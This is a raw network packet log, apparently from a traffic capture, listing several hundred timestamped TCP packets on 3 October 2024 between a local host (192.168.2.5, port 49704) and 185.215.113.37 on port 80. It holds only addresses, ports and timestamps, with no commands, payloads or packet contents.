Oct 3, 2024 21:36:13.944757938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944777012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944814920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944834948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944849014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944864035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944871902 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944885015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944895029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944904089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944911003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944936991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944943905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944953918 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944960117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944971085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944977999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944987059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.944993973 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.944998980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945008993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945018053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945029974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945069075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945262909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945274115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945283890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945293903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945305109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945313931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945321083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945332050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945341110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945349932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945359945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945378065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945452929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945691109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945700884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945712090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945723057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945733070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945744038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945750952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945765018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945775986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945780993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945790052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945801020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945806980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945816040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945827007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945838928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945843935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945853949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945859909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945868969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945878983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945889950 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945895910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.945921898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.945946932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.946698904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946710110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946716070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946732044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946742058 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946758986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946765900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.946774960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946785927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946796894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.946811914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946819067 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.946826935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946836948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946846008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946858883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.946863890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.946880102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.946894884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947475910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947485924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947496891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947506905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947518110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947525978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947535038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947546005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947552919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947561979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947571039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947587967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947594881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947602987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947624922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947633028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947638988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947648048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947657108 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947668076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947678089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.947685003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.947707891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.948384047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948395014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948405027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948415995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948426962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948435068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.948445082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948455095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948463917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.948472023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948482037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948489904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.948498011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:13.948513985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:13.948540926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.028800011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.028851032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.028948069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.028956890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.028966904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.028978109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.028985023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.028995991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029026985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029037952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029047012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029083014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029104948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029115915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029126883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029149055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029174089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029344082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029355049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029365063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029376984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029382944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029408932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029428959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029484034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029494047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029530048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029546976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029557943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029567957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029578924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029616117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029788017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029798985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029808044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029824018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029839039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.029957056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029968023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029977083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029987097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.029994011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030004025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030108929 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030214071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030225039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030251026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030270100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030345917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030355930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030366898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030376911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030384064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030391932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030407906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030422926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030589104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030599117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030608892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030628920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030643940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030651093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030662060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030690908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030698061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030706882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030718088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.030726910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.030755043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031039953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031053066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031068087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031075001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031092882 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031100035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031105995 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031115055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031124115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031131029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031143904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031160116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031339884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031348944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031358957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031369925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031379938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031392097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031407118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031424999 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031611919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031621933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031630993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031641960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031661987 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031692028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031866074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031877041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031887054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031896114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.031918049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.031940937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032013893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032025099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032033920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032046080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032052040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032063961 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032079935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032089949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032099009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032104969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032114029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032124996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032130957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032140017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032150984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032160044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032186985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.032962084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032973051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032982111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032993078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.032999992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033009052 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033019066 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033025026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033035040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033046961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033052921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033061981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033070087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033078909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033087969 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033097029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033106089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033113956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033126116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033138037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033147097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033153057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033163071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033171892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033178091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033186913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033194065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033201933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033210993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033227921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033246040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033914089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033924103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033932924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033942938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033948898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033957958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033967972 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.033973932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033983946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033993959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.033999920 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034008980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034017086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034024954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034033060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034039974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034049988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034061909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034066916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034075975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034085989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034096003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034102917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034118891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034136057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034863949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034873962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034883976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034893990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034903049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034910917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034920931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034930944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034936905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034945965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034955978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034965992 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034974098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.034981012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034991980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.034998894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.035007000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.035016060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.035022974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.035032988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.035043001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.035049915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.035060883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.035069942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.035085917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.035109043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.116122007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116132975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116142035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116169930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.116194010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.116276026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116285086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116293907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116301060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.116308928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116316080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.116328955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 3, 2024 21:36:14.116343021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 3, 2024 21:36:14.116347075 CEST	49704	80	192.168.2.5	185.215.113.37
